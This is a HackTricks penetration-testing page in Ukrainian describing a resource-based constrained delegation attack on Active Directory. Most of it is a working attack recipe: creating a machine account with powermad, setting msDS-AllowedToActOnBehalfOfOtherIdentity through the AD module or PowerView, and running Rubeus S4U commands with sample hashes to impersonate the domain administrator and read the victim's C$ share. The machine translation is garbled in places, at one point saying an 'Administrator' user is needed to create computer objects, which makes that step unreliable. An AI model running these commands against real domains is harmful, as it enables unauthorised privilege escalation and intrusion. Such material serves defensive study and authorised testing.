hacktricks/windows-hardening/active-directory-methodology/resource-based-constrained-delegation.md
2024-03-29 19:49:46 +01:00

13 KiB
Raw Blame History

Ресурсна обмежена делегація

Вивчайте хакінг AWS від нуля до героя з htARTE (HackTricks AWS Red Team Expert)!

Інші способи підтримки HackTricks:

Основи ресурсної обмеженої делегації

Це схоже на базову Обмежену делегацію, але замість надання дозволів об'єкту для втілення будь-якого користувача проти служби. Ресурсна обмежена делегація встановлює в об'єкті, хто може втілювати будь-якого користувача проти нього.

У цьому випадку обмежений об'єкт матиме атрибут під назвою msDS-AllowedToActOnBehalfOfOtherIdentity з ім'ям користувача, який може втілювати будь-якого іншого користувача проти нього.

Ще одна важлива відмінність цієї Обмеженої делегації від інших делегацій полягає в тому, що будь-який користувач з правами запису над обліковим записом машини (GenericAll/GenericWrite/WriteDacl/WriteProperty/тощо) може встановити msDS-AllowedToActOnBehalfOfOtherIdentity (у інших формах делегації вам потрібні привілеї адміністратора домену).

Нові концепції

У випадку Обмеженої делегації було сказано, що прапорець TrustedToAuthForDelegation всередині значення userAccountControl користувача потрібен для виконання S4U2Self. Але це не зовсім правда.
Насправді, навіть без цього значення ви можете виконати S4U2Self проти будь-якого користувача, якщо ви є службою (маєте SPN), але якщо у вас є TrustedToAuthForDelegation, повернений TGS буде Forwardable, і якщо у вас немає цього прапорця, повернений TGS не буде Forwardable.

Однак, якщо TGS, використаний в S4U2Proxy, НЕ є Forwardable, спроба зловживання базовою Обмеженою делегацією не працюватиме. Але якщо ви намагаєтеся використати ресурсно-обмежену делегацію, це працюватиме (це не вразливість, це, здається, функція).

Структура атаки

Якщо у вас є еквівалентні права запису над обліковим записом Комп'ютера, ви можете отримати привілегований доступ до цієї машини.

Припустимо, що зловмисник вже має еквівалентні права запису над обліковим записом жертви.

  1. Зловмисник компрометує обліковий запис, який має SPN, або створює один ("Служба A"). Зверніть увагу, що будь-який Адміністратор користувач без будь-яких інших спеціальних привілеїв може створити до 10 об'єктів Комп'ютера (MachineAccountQuota) і встановити їм SPN. Таким чином, зловмисник може просто створити об'єкт Комп'ютера та встановити SPN.
  2. Зловмисник зловживлює своїми правами ЗАПИСУ над обліковим записом жертви (СлужбаB), щоб налаштувати ресурсно-обмежену делегацію для дозволу СлужбіA втілювати будь-якого користувача проти цієї облікової записи жертви (СлужбаB).
  3. Зловмисник використовує Rubeus для виконання повної атаки S4U (S4U2Self та S4U2Proxy) від Служби A до Служби B для користувача з привілейованим доступом до Служби B.
  4. S4U2Self (від облікового запису, який компрометований/створений): Запитати TGS Адміністратора для мене (Не Forwardable).
  5. S4U2Proxy: Використовуйте не Forwardable TGS з попереднього кроку, щоб запитати TGS від Адміністратора до жертви хоста.
  6. Навіть якщо ви використовуєте не Forwardable TGS, оскільки ви експлуатуєте ресурсно-обмежену делегацію, це працюватиме.
  7. Зловмисник може передати квиток та втілити користувача, щоб отримати доступ до облікового запису жертви B.

Щоб перевірити MachineAccountQuota домену, ви можете використовувати:

Get-DomainObject -Identity "dc=domain,dc=local" -Domain domain.local | select MachineAccountQuota

Атака

Створення об'єкта комп'ютера

Ви можете створити об'єкт комп'ютера всередині домену, використовуючи powermad:

import-module powermad
New-MachineAccount -MachineAccount SERVICEA -Password $(ConvertTo-SecureString '123456' -AsPlainText -Force) -Verbose

# Check if created
Get-DomainComputer SERVICEA

Налаштування обмеження делегування на основі ресурсів

Використання модуля PowerShell для дії в активному каталозі

Set-ADComputer $targetComputer -PrincipalsAllowedToDelegateToAccount SERVICEA$ #Assing delegation privileges
Get-ADComputer $targetComputer -Properties PrincipalsAllowedToDelegateToAccount #Check that it worked

Використання powerview

$ComputerSid = Get-DomainComputer FAKECOMPUTER -Properties objectsid | Select -Expand objectsid
$SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;$ComputerSid)"
$SDBytes = New-Object byte[] ($SD.BinaryLength)
$SD.GetBinaryForm($SDBytes, 0)
Get-DomainComputer $targetComputer | Set-DomainObject -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDBytes}

#Check that it worked
Get-DomainComputer $targetComputer -Properties 'msds-allowedtoactonbehalfofotheridentity'

msds-allowedtoactonbehalfofotheridentity
----------------------------------------
{1, 0, 4, 128...}

Виконання повного атаки S4U

Спочатку ми створили новий об'єкт комп'ютера з паролем 123456, тому нам потрібен хеш цього пароля:

.\Rubeus.exe hash /password:123456 /user:FAKECOMPUTER$ /domain:domain.local

Це виведе хеші RC4 та AES для цього облікового запису.
Зараз можна виконати атаку:

rubeus.exe s4u /user:FAKECOMPUTER$ /aes256:<aes256 hash> /aes128:<aes128 hash> /rc4:<rc4 hash> /impersonateuser:administrator /msdsspn:cifs/victim.domain.local /domain:domain.local /ptt

Ви можете згенерувати більше квитків, просто запитавши один раз, використовуючи параметр /altservice у Rubeus:

rubeus.exe s4u /user:FAKECOMPUTER$ /aes256:<AES 256 hash> /impersonateuser:administrator /msdsspn:cifs/victim.domain.local /altservice:krbtgt,cifs,host,http,winrm,RPCSS,wsman,ldap /domain:domain.local /ptt

{% hint style="danger" %} Зверніть увагу, що у користувачів є атрибут, який називається "Не може бути делегованим". Якщо у користувача цей атрибут встановлено на True, ви не зможете видаавати його. Це властивість можна побачити всередині bloodhound. {% endhint %}

Отримання доступу

Остання команда командного рядка виконає повний атаку S4U та впровадить TGS від Адміністратора до цільового хоста в пам'яті.
У цьому прикладі було запитано TGS для служби CIFS від Адміністратора, тому ви зможете отримати доступ до C$:

ls \\victim.domain.local\C$

Зловживання різними сервісними квитками

Дізнайтеся про доступні сервісні квитки тут.

Помилки Kerberos

  • KDC_ERR_ETYPE_NOTSUPP: Це означає, що Kerberos налаштований не використовувати DES або RC4, а ви надаєте лише хеш RC4. Постачте Rubeus принаймні хеш AES256 (або просто постачте йому хеші rc4, aes128 та aes256). Приклад: [Rubeus.Program]::MainString("s4u /user:FAKECOMPUTER /aes256:CC648CF0F809EE1AA25C52E963AC0487E87AC32B1F71ACC5304C73BF566268DA /aes128:5FC3D06ED6E8EA2C9BB9CC301EA37AD4 /rc4:EF266C6B963C0BB683941032008AD47F /impersonateuser:Administrator /msdsspn:CIFS/M3DC.M3C.LOCAL /ptt".split())
  • KRB_AP_ERR_SKEW: Це означає, що час поточного комп'ютера відрізняється від часу DC, і Kerberos не працює належним чином.
  • preauth_failed: Це означає, що задане ім'я користувача + хеші не працюють для входу. Можливо, ви забули поставити "" всередині імені користувача при генерації хешів (`.\Rubeus.exe hash /password:123456 /user:FAKECOMPUTER /domain:domain.local`)
  • KDC_ERR_BADOPTION: Це може означати:
    • Користувач, якого ви намагаєтеся імітувати, не може отримати доступ до потрібного сервісу (через те, що ви не можете його імітувати або через те, що у нього недостатньо привілеїв)
    • Запитаний сервіс не існує (якщо ви просите квиток для winrm, але winrm не працює)
    • Створений fakecomputer втратив привілеї на вразливому сервері, і вам потрібно повернути їх.

Посилання